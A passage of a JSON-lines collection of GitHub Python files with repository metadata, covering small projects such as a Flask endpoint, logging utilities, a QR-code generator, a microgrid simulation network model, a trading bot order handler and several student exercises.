0\n SessionModification = 1\n SessionDelete = 2\n\n\nclass XyzTimerUnit(Enum):\n 
TimerDeactivated = 0\n MultiplesOfHours = 1\n MultiplesOfMinutes = 2\n MultiplesOfSeconds = 3\n\n\nclass SRYP(Enum):\n SessionManagement = 0\n\n\nclass YEW(Enum):\n YewXyzTimer = 0x8\n YewAlwaysOnSession = 0x9\n\n\nclass XyzTimer:\n def __init__(self):\n self.timer_unit = XyzTimerUnit.TimerDeactivated\n self.timer_value = 0\n\n def set(self, unit, amount):\n self.timer_unit = unit\n self.timer_value = amount\n\n def encode(self, data):\n data.append(YEW.YewXyzTimer.value)\n temp = self.timer_unit.value << 5\n if self.timer_unit != XyzTimerUnit.TimerDeactivated:\n if self.timer_value <= 0x1F: # 5 bits max range\n temp |= (self.timer_value & 0x1F)\n else:\n print(\"XYZ timer value out of range. Encoding max value\")\n temp |= 0x1F\n data.append(temp)\n\n\nclass SessionModificationCommand:\n def __init__(self, session_id, transaction_id):\n self.type = MessageType.SessionModification\n self.session_id = session_id\n self.transaction_id = transaction_id\n self.has_xyz_timer = False\n self.xyz_timer = XyzTimer()\n self.has_pqvl = False\n self.pvql = 0\n self.sryp_id = SRYP.SessionManagement\n\n def update_xyz_timer(self, unit, amount):\n self.has_xyz_timer = True\n self.xyz_timer.set(unit, amount)\n\n def update_pqvl(self, value):\n self.has_pqvl = True\n self.pvql = value\n\n def encode(self, data):\n data.append(self.sryp_id.value)\n data.append(self.session_id)\n data.append(self.transaction_id)\n data.append(self.type.value)\n \n if (self.has_xyz_timer):\n self.xyz_timer.encode(data)\n if (self.has_pqvl):\n self.encode_pqvl(data)\n\n def encode_pqvl(self, data):\n data.append(YEW.YewAlwaysOnSession.value << 4 | (self.pvql & 0x01))\n\nclass ByteBuffer:\n def __init__(self):\n self.buffer = []\n self.current = 0\n\n def getAvailable(self):\n return len(self.buffer) - self.current\n\n def read(self):\n value = self.buffer[self.current]\n self.current += 1\n return value\n\n def append(self, i):\n self.buffer.append(i)","repo_name":"emilybache/Encode-TestDesign-Kata","sub_path":"python/encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"56"} +{"seq_id":"16758066509","text":"from flask import *\nimport config, json, traceback, requests, sys\nsys.path.insert(0, '.')\nfrom runner import returnJSON\n\n#setup the flask blueprint\nmain = Blueprint('main', __name__)\n\n#our api endpoint route. 
users have parameter(s): origin, destination, one -> four\n@main.route('/api', methods=['GET'])\ndef main_route():\n if request.method == 'GET':\n origin = request.args.get('origin'); destination = request.args.get('destination')\n one = request.args.get('one'); two = request.args.get('two')\n three = request.args.get('three'); four = request.args.get('four')\n return returnJSON(origin, destination)\n\n#ensure that the response headers are set to return application/json.\n@main.after_request\ndef apply_json(response):\n response.headers['content-type'] = 'application/json'\n return response","repo_name":"abrowne2/Carby","sub_path":"carby/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"75005703533","text":"from mplogger import *\r\nimport logging, logging.config\r\nfrom worker import Worker\r\nfrom time import sleep\r\n\r\nif __name__ == '__main__':\r\n #Start the listener\r\n logQueue = Queue()\r\n print('Main logQueue {}'.format(logQueue))\r\n listener = LogListener(logQueue)\r\n listener.start()\r\n config = sender_config\r\n config['handlers']['queue']['queue'] = logQueue\r\n logging.config.dictConfig(config)\r\n logger = logging.getLogger('application')\r\n \r\n logger.info('Starting subprocesses')\r\n \r\n procs = []\r\n for i in range(5):\r\n p = Worker('SP{}'.format(i),config)\r\n procs.append(p)\r\n p.start()\r\n \r\n #Let the subprocesses run for 10 seconds, then tell them to stop\r\n sleep(10)\r\n for p in procs:\r\n p.stop()\r\n p.join()\r\n \r\n logger.info('Subprocesses stopped')\r\n listener.stop()\r\n ","repo_name":"Golgothen/MultiprocessLogging","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"16996771795","text":"import sys\nrl = sys.stdin.readline\n\n\ndef find_ables(_x):\n if _x != ables[_x]:\n ables[_x] = find_ables(ables[_x])\n return ables[_x]\n\n\ndef simulate(_cnt):\n for i in range(_cnt):\n n = int(rl())\n able = find_ables(n)\n if able == 0:\n return i\n else:\n ables[able] = find_ables(able - 1)\n return _cnt\n\n\nG, P = int(rl()), int(rl())\nables = [i for i in range(G + 1)]\n\nprint(simulate(P))\n","repo_name":"doggydeok2/Problem-Solving","sub_path":"BOJ/10775 공항.py","file_name":"10775 공항.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"2651590978","text":"'''\nAuthor: Javad Torkzadehmahani\nStudent ID: 982164624\nInstructor: Prof. Ghafouri\nCourse: Advanced Programming (Python)\nGoal: working with nested loop\n'''\n\ndef factorial(X):\n fact = 1\n for counter in range (1 , X + 1):\n fact = fact * counter\n return fact\n\nsum = 0\nN = int(input(\"Enter N: \"))\nfor counter in range (2 , 2 * N + 1 , 2):\n sum = factorial(counter) + sum\n\nprint(\"fact(2) + ... 
+ fact(2N) is: \", sum)","repo_name":"javad-torkzadeh/courses","sub_path":"python_course/ch4_NL_exercise3.py","file_name":"ch4_NL_exercise3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"13813027611","text":"\r\nfrom google.cloud import language\r\n\r\n\r\nlanguage_client = language.Client()\r\n\r\ntext = 'i hate this and its bad'\r\ndocument = language_client.document_from_text(text)\r\n\r\nsentiment = document.analyze_sentiment()\r\n\r\nprint('Text: {}'.format(text))\r\nprint('Sentiment: {}, {}'.format(sentiment.score, sentiment.magnitude))","repo_name":"kavyaprathyusha/sentimental-analysis","sub_path":"sent.py","file_name":"sent.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12465843464","text":"# -*- coding:utf-8 -*-\nimport os,os.path\nimport shutil\nimport hashlib\n\ndef _get_qr_url(appId,app_apk_url,logo_url=''):\n directory = 'static/qrdata/{f1}/{f2}/'.format(f1=appId/100000,f2=(appId%100000)/2000)\n qr_path = os.path.join(app.config['ROOT_PATH'],directory)\n if not os.path.exists(qr_path):\n os.makedirs(qr_path)\n\n md5File = '%s.png' % hashlib.md5(app_apk_url).hexdigest()\n qr_file = '%s%s' % (qr_path,md5File)\n qr_url = directory + md5File\n if os.path.exists(qr_file):\n return qr_url\n else:\n import qrcode\n from PIL import Image\n\n qr = qrcode.QRCode(\n version=2,\n error_correction=qrcode.constants.ERROR_CORRECT_H,\n box_size=8,\n border=2\n )\n qr.add_data(app_apk_url)\n qr.make(fit=True)\n img = qr.make_image()\n img = img.convert(\"RGBA\")\n\n logo_file = _get_apk_logo(appId,logo_url)\n if logo_file and os.path.exists(logo_file):\n icon = Image.open(logo_file)\n img_w, img_h = img.size\n factor = 4\n size_w = int(img_w / factor)\n size_h = int(img_h / factor)\n\n icon_w, icon_h = icon.size\n if icon_w > size_w:\n icon_w = size_w\n if icon_h > size_h:\n icon_h = size_h\n icon = icon.resize((icon_w, icon_h), Image.ANTIALIAS)\n\n w = int((img_w - icon_w) / 2)\n h = int((img_h - icon_h) / 2)\n icon = icon.convert(\"RGBA\")\n img.paste(icon, (w, h), icon)\n\n img.save(qr_file)\n return qr_url","repo_name":"randy-ran/randy-ran.github.io","sub_path":"qrcode_demo/qr_demo.py","file_name":"qr_demo.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12316820084","text":"\nfrom src.sharedstate import SharedState\n\n\nclass BybitOrderHandler:\n\n\n def __init__(self, sharedstate: SharedState) -> None:\n self.ss = sharedstate\n\n \n def sync(self, recv: dict) -> None:\n\n data = recv[\"result\"][\"list\"]\n\n self.ss.current_orders = {\n o[\"orderId\"]: {\"price\": float(o[\"price\"]), \"qty\": float(o[\"qty\"]), \"side\": o[\"side\"]} \n for o in data\n }\n\n def process(self, data: dict) -> None:\n\n new_orders = {\n order[\"orderId\"]: {\"price\": order[\"price\"], \"qty\": order[\"qty\"], \"side\": order[\"side\"]}\n for order in data\n if order.get(\"orderStatus\") == \"New\"\n }\n\n filled_orders = set(\n order[\"orderId\"] \n for order in data \n if order[\"orderStatus\"] == \"Filled\"\n )\n\n # Update the orders\n self.ss.current_orders.update(new_orders)\n\n # Remove filled orders\n for order_id in filled_orders:\n self.ss.current_orders.pop(order_id, 
None)\n","repo_name":"beatzxbt/bybit-smm","sub_path":"src/exchanges/bybit/websockets/handlers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"56"} +{"seq_id":"11806898239","text":"import sys\nfrom itertools import chain\nfrom typing import Optional\n\nimport numpy as np\nimport yaml\nfrom more_itertools import collapse\n\nfrom openmodelica_microgrid_gym.aux_ctl import PLL, PLLParams, dq0_to_abc, inst_power, inst_reactive, DDS, DroopParams, \\\n DroopController, InverseDroopController, InverseDroopParams\n\n\nclass Network:\n def __init__(self, ts, v_nom, freq_nom=50):\n self.ts = ts\n self.v_nom = v_nom\n self.freq_nom = freq_nom\n\n @classmethod\n def load(cls, configurl='net.yaml'):\n \"\"\"\n Initialize object from config file\n\n :param configurl:\n :return:\n \"\"\"\n data = yaml.safe_load(open(configurl))\n components = data['components']\n del data['components']\n self = cls(**data)\n\n components_obj = []\n for name, component in components.items():\n # resolve class from 'cls' argument\n comp_cls = component['cls']\n del component['cls']\n comp_cls = getattr(sys.modules[__name__], comp_cls)\n\n # rename keys (because 'in' is a reserved keyword)\n if 'in' in component:\n component['in_vars'] = component.pop('in')\n if 'out' in component:\n component['out_vars'] = component.pop('out')\n\n # instanciate component class\n try:\n components_obj.append(comp_cls(net=self, **component))\n except AttributeError as e:\n raise AttributeError(f'{e!s}, please validate {configurl}')\n self.components = components_obj\n\n return self\n\n def reset(self):\n for comp in self.components:\n comp.reset()\n\n def params(self, actions):\n \"\"\"\n Allows the network to add additional parameters like changing loads to the simulation\n\n :param actions:\n :return: mapping of additional actions and list of actions.\n \"\"\"\n d = {}\n for comp in self.components:\n params = comp.params(actions)\n d.update(params)\n return d\n\n def augment(self, state: np.ndarray, normalize=True) -> np.ndarray:\n \"\"\"\n Allows the network to provide additional output variables in order to provide measurements and reference\n information the RL agent needs to understand its rewards\n :param state:\n :return:\n \"\"\"\n return np.hstack([comp.augment(state, normalize) for comp in self.components])\n\n def in_vars(self):\n return list(collapse([comp.get_in_vars() for comp in self.components]))\n\n def out_vars(self, with_aug=True, flattened=True):\n r = [comp.get_out_vars(with_aug) for comp in self.components]\n if flattened:\n return list(collapse(r))\n return r\n\n @property\n def components(self):\n return self._components\n\n @components.setter\n def components(self, val):\n self._components = val\n keys = self.out_vars(with_aug=False, flattened=True)\n for comp in self.components:\n comp.set_outidx(keys)\n\n\nclass Component:\n def __init__(self, net: Network, id=None, in_vars=None, out_vars=None, out_calc=None):\n \"\"\"\n\n :param net:\n :param id:\n :param in_vars:\n :param out_vars:\n :param out_calc: mapping from attr name to\n \"\"\"\n self.net = net\n self.id = id\n for attr in chain.from_iterable((f.keys() for f in filter(None, (in_vars, out_vars)))):\n if not hasattr(self, attr):\n raise AttributeError(f'{self.__class__} no such attribute: {attr}')\n self.in_vars = in_vars\n self.in_idx = None # type: Optional[dict]\n\n self.out_calc = out_calc or {}\n self.out_vars = out_vars\n 
self.out_idx = None # type: Optional[dict]\n\n def reset(self):\n pass\n\n def params(self, actions):\n \"\"\"\n Calculate additional environment parameters\n :param actions:\n :return: mapping\n \"\"\"\n return {}\n\n def get_in_vars(self):\n \"\"\"\n list of input variable names of this component\n \"\"\"\n if self.in_vars:\n return [[self._prefix_var(val) for val in vals] for attr, vals in self.in_vars.items()]\n return []\n\n def get_out_vars(self, with_aug=False):\n r = []\n if self.out_vars:\n r = [[self._prefix_var(val) for val in vals] for attr, vals in self.out_vars.items()]\n\n if not with_aug:\n return r\n else:\n return r + [[self._prefix_var([attr, str(i)]) for i in range(n)] for attr, n in self.out_calc.items()]\n\n def fill_tmpl(self, state):\n if self.out_idx is None:\n raise ValueError('call set_tmplidx before fill_tmpl. the keys must be converted to indices for efficiency')\n for attr, idxs in self.out_idx.items():\n # set object variables to the respective state variables\n if hasattr(self, attr):\n setattr(self, attr, state[idxs])\n else:\n raise AttributeError(f'{self.__class__} has no such attribute: {attr}')\n\n def set_outidx(self, keys):\n # this is mainly for performance reasons\n keyidx = {v: i for i, v in enumerate(keys)}\n self.out_idx = {}\n try:\n for var, keys in self.out_vars.items():\n # lookup index in the whole state keys\n self.out_idx[var] = [keyidx[self._prefix_var(key)] for key in keys]\n except KeyError as e:\n raise KeyError(f'the output variable {e!s} is not provided by your state keys')\n\n def _prefix_var(self, strs):\n if isinstance(strs, str):\n strs = [strs]\n if self.id is not None and strs[0].startswith('.'):\n # this is a complete identifier like 'lc1.inductor1.i' that should not be modified:\n # first string minus its prefix '.' and the remaining strs\n strs = [self.id] + [strs[0][1:]] + strs[1:]\n return '.'.join(strs)\n\n def calculate(self):\n \"\"\"\n will write internal variables it is called after all internal variables are set\n The return value must be a dictionary whose keys match the keys of self.out_calc and whose values are of the length of outcalcs values\n\n set(self.out_calc.keys()) == set(return)\n all([len(v) == self.out_calc[k] for k,v in return.items()])\n :return:\n \"\"\"\n return dict(iref=[.1, 22, 4], vref=[])\n\n def normalize(self, calc_data):\n pass\n\n def augment(self, state, normalize=True):\n self.fill_tmpl(state)\n calc_data = self.calculate()\n\n if normalize:\n self.normalize(calc_data)\n attr = ''\n try:\n new_vals = []\n for attr, n in self.out_calc.items():\n for i in range(n):\n new_vals.append(calc_data[attr][i])\n return np.hstack([getattr(self, attr) for attr in self.out_idx.keys()] + new_vals)\n except KeyError as e:\n raise ValueError(\n f'{self.__class__} missing return key: {e!s}. 
did you forget to set it in the calculate method?')\n except IndexError as e:\n raise ValueError(f'{self.__class__}.calculate()[{attr}] has the wrong number of values')\n\n\nclass Inverter(Component):\n def __init__(self, u=None, i=None, v=None, i_nom=20, i_lim=30, v_lim=600, v_DC=1000, i_ref=(0, 0, 0), **kwargs):\n self.u = u\n self.v = v\n self.i = i\n self.i_nom = i_nom\n self.i_lim = i_lim\n self.v_lim = v_lim\n self.v_DC = v_DC\n self.i_ref = i_ref\n super().__init__(**{'out_calc': dict(i_ref=3), **kwargs})\n\n def normalize(self, calc_data):\n self.i /= self.i_lim\n self.v /= self.v_lim\n calc_data['i_ref'] /= self.i_lim\n\n def params(self, actions):\n return {**super().params(actions), **{self._prefix_var(['.v_DC']): self.v_DC}}\n\n\nclass SlaveInverter(Inverter):\n def __init__(self, pll=None, pdroop=None, qdroop=None, **kwargs):\n super().__init__(**kwargs)\n\n pdroop = {**dict(gain=40000.0), **(pdroop or {})}\n qdroop = {**dict(gain=50.0), **(qdroop or {})}\n pll = {**dict(kP=10, kI=200), **(pll or {})}\n\n self.pdroop_ctl = InverseDroopController(\n InverseDroopParams(tau=self.net.ts, nom_value=self.net.freq_nom, **pdroop), self.net.ts)\n self.qdroop_ctl = InverseDroopController(\n InverseDroopParams(tau=self.net.ts, nom_value=self.net.v_nom, **qdroop), self.net.ts)\n # default pll params and new ones\n self.pll = PLL(PLLParams(f_nom=self.net.freq_nom, **pll), self.net.ts)\n\n def reset(self):\n self.pdroop_ctl.reset()\n self.qdroop_ctl.reset()\n self.pll.reset()\n\n def calculate(self):\n _, _, phase = self.pll.step(self.v)\n return dict(i_ref=dq0_to_abc(self.i_ref, phase))\n\n\nclass MasterInverter(Inverter):\n def __init__(self, v_ref=(1, 0, 0), pdroop=None, qdroop=None, **kwargs):\n self.v_ref = v_ref\n super().__init__(out_calc=dict(i_ref=3, v_ref=3), **kwargs)\n pdroop = {**(pdroop or {}), **dict(gain=40000.0, tau=.005)}\n qdroop = {**(qdroop or {}), **dict(gain=1000.0, tau=.002)}\n\n self.pdroop_ctl = DroopController(DroopParams(nom_value=self.net.freq_nom, **pdroop), self.net.ts)\n self.qdroop_ctl = DroopController(DroopParams(nom_value=self.net.v_nom, **qdroop), self.net.ts)\n self.dds = DDS(self.net.ts)\n\n def reset(self):\n self.pdroop_ctl.reset()\n self.qdroop_ctl.reset()\n self.dds.reset()\n\n def calculate(self):\n instPow = -inst_power(self.v, self.i)\n freq = self.pdroop_ctl.step(instPow)\n # Get the next phase rotation angle to implement\n phase = self.dds.step(freq)\n\n instQ = -inst_reactive(self.v, self.i)\n v_refd = self.qdroop_ctl.step(instQ)\n v_refdq0 = np.array([v_refd, 0, 0]) * self.v_ref\n\n return dict(i_ref=dq0_to_abc(self.i_ref, phase), v_ref=dq0_to_abc(v_refdq0, phase))\n\n def normalize(self, calc_data):\n super().normalize(calc_data),\n calc_data['v_ref'] /= self.v_lim\n\n\nclass Load(Component):\n def __init__(self, i=None, **kwargs):\n self.i = i\n super().__init__(**kwargs)\n\n def params(self, actions):\n # TODO: perhaps provide modelparams that set resistance value\n return super().params(actions)\n","repo_name":"00mjk/openmodelica-microgrid-gym","sub_path":"openmodelica_microgrid_gym/net/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":10467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"56"} +{"seq_id":"3299369738","text":"states = int(input(\"How many states are there?\"))\n\ni = 1\n\nstatesarray = []\nmainarray = []\nsidearray = []\n\nwhile i < states + 1:\n statesarray.append(i)\n i += 1\n\nh = 0\nf = 0\n\nwhile h < len(statesarray):\n while f < len(statesarray):\n probability = 
input(\"Probability of transitioning from\" + str(statesarray[h]) + \"to\" + str(statesarray[f]))\n sidearray.append(probability)\n if len(sidearray) == len(statesarray):\n mainarray.append(sidearray)\n sidearray.clear()\n f += 1\nh += 1\n\n# categorized such that probability of state 1 transitioning to stage 4 is mainarray[0][3]\n# probability of transitioning from state m to state n is mainarray[m-1][n-1]\n\nresult = 1\n\n# we want to calculate the probability of n state transitions\n\ntransitions = int(input(\"Enter the number of transitions involved:\"))\n\ni = 0\n\nwhile i < transitions:\n firststate = int(input(\"Enter the state you're transitioning from:\"))\n secondstate = int(input(\"Enter the state you're transitioning to:\"))\n result *= mainarray[firststate - 1][secondstate - 1]\ni += 1\n\nprint(result)\n","repo_name":"ShizhongHu/Markov-Chain-Simulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"6237054179","text":"#################################\n# TEMPLATE CLASS\n# Handles user input and the main game loop.\n################################\nfrom game.word_manager import WordManager \nfrom game.graphic_manager import GraphicManager\nfrom game.terminal_service import TerminalService\n\nclass Director:\n\n \"\"\"\n This class is working to call start_game, get_word_masked, get_word, and get_guessed_left. \n\n Sterotypes: Structurer, Coordinator, Controller\n \n Args:\n start_game:Starts the game and calls get_word, update_word, and get_word_masked\n get_word_masked:Gets the word the user will guess on\n get_word:matches the correct word from get_word_masked\n get_guessed_left:Gives the user the remaining guesses\n\n \n \"\"\"\n\n #Initialize necessary classes and attributes\n def __init__(self):\n \"\"\"The class constructor\n Args:\n self.WordManager: an instance for word_Manager\n self.GraphicManager: an instance for graphic_manager\n \"\"\"\n self._graphic = GraphicManager() \n self._is_playing = True \n self._words= WordManager() \n self._terminal_service = TerminalService() \n self._guess = ''\n \n \n\n #TEMPLATE FUNCTION\n #contains game loop--order of play\n def start_game(self):\n \"\"\"The class Information Holder\n Args:\n self (Director): an instance of Director\n\n \"\"\"\n \n #display hypthens \n\n\n while self._is_playing: \n self.get_inputs() \n self.do_updates() \n self.do_outputs() \n\n def get_inputs(self): \n \"\"\" gets the masked word from word manager\n\n Args: \n self (Director): an instance of Director\n \"\"\"\n self._words.print_guessedWord() #display gueessed word from word manager \n\n self._graphic.print_parachute() #display graphic\n #ask for letter guess \n self._guess = (self._terminal_service.read_text(\"\\nGuess a letter [A-Z]: \")).lower()\n \n\n def do_updates(self): \n \"\"\"Updates letter found in word or removes portion of parachute \n\n Args: \n self (Director): An instance of Director.\n \"\"\" \n # Heidi you can also give feedback to the user with the wrong() and right() methods from terminal_service \n # (check_letter return true if guess is in the word false in other case)\n\n #looks for letter in word and updates letter in word\n self._words.check_letter(self._guess)\n if self._words.check_letter(self._guess) == True:\n self._terminal_service.right()\n else:\n self._terminal_service.wrong()\n #removes portion of parachute -> Use decrease_lives() from graphic_manager\n 
self._graphic.decrease_lives()\n\n\n def do_outputs(self): \n \"\"\"Determines game won or lost. Continues play or ends game. \n \n Args: \n self (Director): An instance of Director. \n \"\"\" \n\n #if word is solved - winner\n\n if self._words.user_wins() == True: \n self._is_playing = False \n # print(\"You Won\") #Diego pls Change this line for the method you_win()\n self._words.print_guessedWord() \n self._graphic.print_parachute()\n self._terminal_service.you_win()\n exit()\n\n #if parachute removed - game over \n if self._graphic.get_lives() <= 0: \n # print(\"Game Over\") #Diego pls Change this line for the method game_over()\n self._words.print_guessedWord() \n self._graphic.print_parachute()\n self._terminal_service.game_over()\n exit()\n ","repo_name":"diamonddan/cse-210-Jumper","sub_path":"Jumper/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20070623969","text":"import boto3\n\necs = boto3.client('ecs')\nresponse = ecs.create_capacity_provider(\n name='capacity-to-serverless-cluster',\n autoScalingGroupProvider={\n 'autoScalingGroupArn': 'arn:aws:ecs:eu-west-3:111866276431:cluster/Fargate-cluster-ecs-stoic',\n 'managedScaling': {\n 'status': 'ENABLED',\n },\n 'managedTerminationProtection': 'DISABLED'\n },\n tags=[\n {\n 'key': 'env',\n 'value': 'test'\n },\n ]\n)","repo_name":"lusien88/py-test","sub_path":"configure-capacity-fargate-cluster-ecs.py","file_name":"configure-capacity-fargate-cluster-ecs.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36577405469","text":"# compatibility with faker.rb yaml file interpolation\nimport os\nimport yaml\nimport random\nimport re\nimport hashlib\n\nfrom .debug import debug, verbose\nfrom .helpers import LAMBDA_TYPE, readfile, exit_error\n\n# a key looks like: base.field\n# base maps to faker/lib/locales/en/base.yaml\n# field maps into that file. 
fields can be defined\n# recursively\n\nLOCALE = \"en\"\n\nfrom os import environ as ENV\nif \"LOCALE\" in ENV:\n LOCALE = ENV[\"LOCALE\"]\n\nDEFAULT_LOCALE = \"en\"\n\nOPENED_DATA = {}\nCACHE_DIR = os.path.expanduser(\"~/.cache/plait.py/\")\nDIRTY_CACHE = False\n\nSCRIPT_PATH = os.path.realpath(__file__)\nFAKER_DIR = os.path.realpath(os.path.join(__file__, \"..\", \"..\", \"vendor/faker/\"))\nLOCALE_DIR = \"lib/locales/\"\n\nif not os.path.exists(CACHE_DIR):\n try:\n os.makedirs(CACHE_DIR)\n except:\n debug(\"Can't create cache for fakerb data in\", CACHE_DIR)\n pass\n\nFAKERB_PICKLE = \"%s/fakerb.pickle\" % CACHE_DIR\n\ndef setup_data(filename, doc, data):\n global DIRTY_CACHE\n OPENED_DATA[filename] = doc\n data = str(data).encode(\"utf-8\")\n OPENED_DATA[filename][\"md5\"] = hashlib.md5(data).hexdigest()\n\n DIRTY_CACHE=True\n\ndef list_namespaces():\n files = os.listdir(os.path.join(FAKER_DIR, LOCALE_DIR, DEFAULT_LOCALE))\n\n for f in sorted(files):\n if f.find(\"yml\") != -1:\n yield f.replace(\".yml\", \"\")\n\ndef parse_key(fullkey, basename=None):\n if not OPENED_CACHE:\n open_cache()\n\n if type(fullkey) != str:\n return fullkey\n\n tokens = fullkey.split()\n plan = []\n\n start_i = 0\n end_i = -1\n\n def make_fetcher(group, basename):\n return lambda: fetch(group, basename)\n\n while True:\n start_i = fullkey.find(\"#{\", start_i);\n\n if start_i == -1:\n break\n else:\n if end_i+1 < start_i:\n plan.append(fullkey[end_i+1:start_i])\n\n end_i = fullkey.find(\"}\", start_i)\n\n if end_i == -1:\n break\n\n group = fullkey[start_i+2:end_i]\n\n plan.append(make_fetcher(group, basename))\n\n\n start_i = end_i\n\n if start_i == -1 and end_i == 0:\n plan.append(fullkey)\n\n return plan\n\n\n# decode turns a string into its matching value,\n# but it is slow to continually reparse the same string\n# so if we can come up with an execution plan (of lambdas),\n# we are better off\nPLANS={}\ndef decode(fullkey,basename=None):\n if type(fullkey) != str:\n return fullkey\n\n if fullkey.find(\"#{\") == -1:\n return fullkey\n\n if fullkey in PLANS:\n plan = PLANS[fullkey]\n else:\n verbose(\"BUILDING FETCH PLAN FOR FAKER KEY\", fullkey)\n plan = parse_key(fullkey, basename)\n PLANS[fullkey] = plan\n\n ret = [ x() if type(x) == LAMBDA_TYPE else x for x in plan]\n\n return \"\".join(ret)\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle as pickle\n\nOPENED_CACHE=False\ndef open_cache():\n global OPENED_DATA, DIRTY_CACHE,OPENED_CACHE\n try:\n with open(FAKERB_PICKLE) as f:\n loaded = pickle.load(f)\n OPENED_DATA = loaded\n except Exception as e:\n debug(e)\n\n expired = []\n for file in OPENED_DATA:\n\n if not os.path.exists(file):\n expired.append(file)\n verbose(\"EXPIRING NON EXISTENT FILE\", file)\n continue\n\n with readfile(file) as f:\n data = f.read()\n\n h = hashlib.md5(data)\n d = h.hexdigest()\n\n if not \"md5\" in OPENED_DATA[file] or d != OPENED_DATA[file][\"md5\"]:\n verbose(\"EXPIRING CACHED FILE\", file)\n expired.append(file)\n continue\n\n for file in expired:\n del OPENED_DATA[file]\n\n\n DIRTY_CACHE = False\n OPENED_CACHE = True\n\n open_locale(LOCALE)\n\n\ndef save_cache():\n global DIRTY_CACHE\n if DIRTY_CACHE:\n with open(FAKERB_PICKLE, \"wb\") as f:\n pickle.dump(OPENED_DATA, f)\n\n DIRTY_CACHE = False\n\n\nLOCALE_DATA = {}\ndef open_locale(locale):\n global LOCALE\n LOCALE = locale\n fname = \"%s/%s/%s.yml\" % (FAKER_DIR, LOCALE_DIR, locale)\n\n if not fname in OPENED_DATA:\n verbose(\"READING LOCALE FROM FILE\")\n with readfile(fname) as f:\n data = 
f.read().encode(\"utf-8\")\n\n\n d = hashlib.md5(data).hexdigest()\n\n doc = yaml.load(data)\n setup_data(fname, doc[LOCALE][\"faker\"], data)\n\n LOCALE_DATA.clear()\n LOCALE_DATA.update(OPENED_DATA[fname])\n\n\ndef fetch(key, fallback_base, lookup=False):\n tokens = key.split(\".\")\n if len(tokens) > 1:\n basename = tokens[0].lower()\n tokens.pop(0)\n else:\n if lookup:\n basename = key\n tokens.pop()\n else:\n basename = fallback_base\n\n fields = None\n if basename in LOCALE_DATA:\n fields = LOCALE_DATA[basename]\n if tokens[0] not in fields:\n fields = None\n\n if not fields:\n dirname = \"%s/lib/locales/%s/\" % (FAKER_DIR, DEFAULT_LOCALE)\n filename = \"%s/%s.yml\" % (dirname, basename)\n if not filename in OPENED_DATA:\n verbose(\"OPENING FAKER FILE\", filename)\n\n with readfile(filename) as f:\n data = f.read()\n\n doc = yaml.load(data)\n setup_data(filename, doc, data)\n else:\n doc = OPENED_DATA[filename]\n fields = doc[DEFAULT_LOCALE][\"faker\"][basename]\n\n for field in tokens:\n fields = fields[field]\n\n if lookup:\n return fields\n\n if type(fields) == list:\n fields = random.choice(fields)\n\n\n # replace \"#\" character with random numbers\n if type(fields) == str:\n fields = decode(fields,basename)\n\n def replace_wildnum(match):\n return str(random.randint(0, 9))\n\n if fields.find(\"#\") != -1:\n fields = re.sub(\"#\", replace_wildnum, fields)\n\n\n\n return fields\n\nif __name__ == \"__main__\":\n decode(\"name.last_name\")\n","repo_name":"plaitpy/plaitpy","sub_path":"src/fakerb.py","file_name":"fakerb.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"56"} +{"seq_id":"35933524445","text":"\"\"\"\nThis module includes function which will help the user\\\nto find needed information zbout Twitter user in json file.\n\"\"\"\nimport json\nfrom colored import fg, attr\n\n\ndef read_json_return_data(path):\n \"\"\"\n This function reads json file and returns data from it.\n \"\"\"\n with open(path, \"r\", encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef find_in_json(data, previous_data):\n \"\"\"\n This function gives an opportunity to the user to find needed information in json file.\n \"\"\"\n print('%sChoose the type of information you want to see \\nor make one step back entering \"back\":%s' % (\n fg(99), attr(0)))\n print(list(data.keys()))\n key = input()\n if key == 'back':\n return find_in_json(previous_data[-2], previous_data[:-1])\n elif key == '':\n return None\n else:\n if isinstance(data[key], list):\n print(f'%sHere are several blocks of information.\\nChoose block from 1 to {len(data[key])}:%s' % (\n fg(99), attr(0)))\n index = int(input()) - 1\n previous_data.append(data[key][index])\n return find_in_json(data[key][index], previous_data)\n if isinstance(data[key], dict):\n previous_data.append(data[key])\n return find_in_json(data[key], previous_data)\n return f'%s{data[key]}%s' % (fg(99), attr(0))\n\n\nif __name__ == \"__main__\":\n print('%sPlease enter the path to json file:%s' % (fg(99), attr(0)))\n path_to_json = input()\n data_from_json = read_json_return_data(path_to_json)\n print(find_in_json(data_from_json, 